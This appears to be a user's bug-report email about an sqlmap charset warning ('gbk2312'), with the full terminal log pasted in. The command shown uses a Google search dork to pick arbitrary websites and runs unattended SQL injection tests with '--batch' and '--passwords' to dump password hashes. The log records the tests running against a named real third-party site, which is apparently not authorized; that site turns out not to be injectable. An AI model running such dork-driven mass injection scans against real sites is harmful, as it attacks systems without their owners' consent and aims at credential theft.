*Reporting*
[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sqlmap-users@lists.sourceforge.net.

*Command*
sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords

*Terminal Readout*
GET http://www.sh-sinap.com/en/Showpro.asp?id=6
do you want to test this URL? [Y/n/q]
> Y
[20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6'
[20:21:40] [INFO] testing connection to the target URL
[20:21:46] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[20:21:50] [INFO] target URL is stable
[20:21:50] [INFO] testing if GET parameter 'id' is dynamic
[20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
[20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
might not be injectable
[20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
[20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
*[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
e-mail to sqlmap-users@lists.sourceforge.net.*
[20:21:53] [INFO] heuristics detected web page charset 'GB2312'
[20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
clause'
[20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
clause'
[20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
WHERE or HAVING clause'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
(XMLType)'
[20:22:46] [INFO] testing 'MySQL inline queries'
[20:22:47] [INFO] testing 'PostgreSQL inline queries'
[20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:22:53] [INFO] testing 'Oracle inline queries'
[20:22:55] [INFO] testing 'SQLite inline queries'
[20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:22:56] [CRITICAL] there is considerable lagging in connection
response(s). Please use as high value for option '--time-sec' as possible
(e.g. 10 or more)
[20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
Do you want to follow? [Y/n] Y
[20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:23:47] [INFO] testing 'Oracle AND time-based blind'
[20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:25:38] [WARNING] using unescaped version of the test because of zero
knowledge of the back-end DBMS. You can try to explicitly set it using
option '--dbms'
[20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
sqlmap is going to retry the request
[20:28:47] [CRITICAL] connection timed out to the target URL or proxy
[20:29:10] [WARNING] user aborted during detection phase
how do you want to proceed? [(S)kip current test/(e)nd detection
phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
[20:29:22] [WARNING] GET parameter 'id' is not injectable
[20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
to increase '--level'/'--risk' values to perform more tests. Also, you can
try to rerun by providing either a valid value for option '--string' (or
'--regexp'), skipping to the next URL
[20:29:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times

Regards
Dan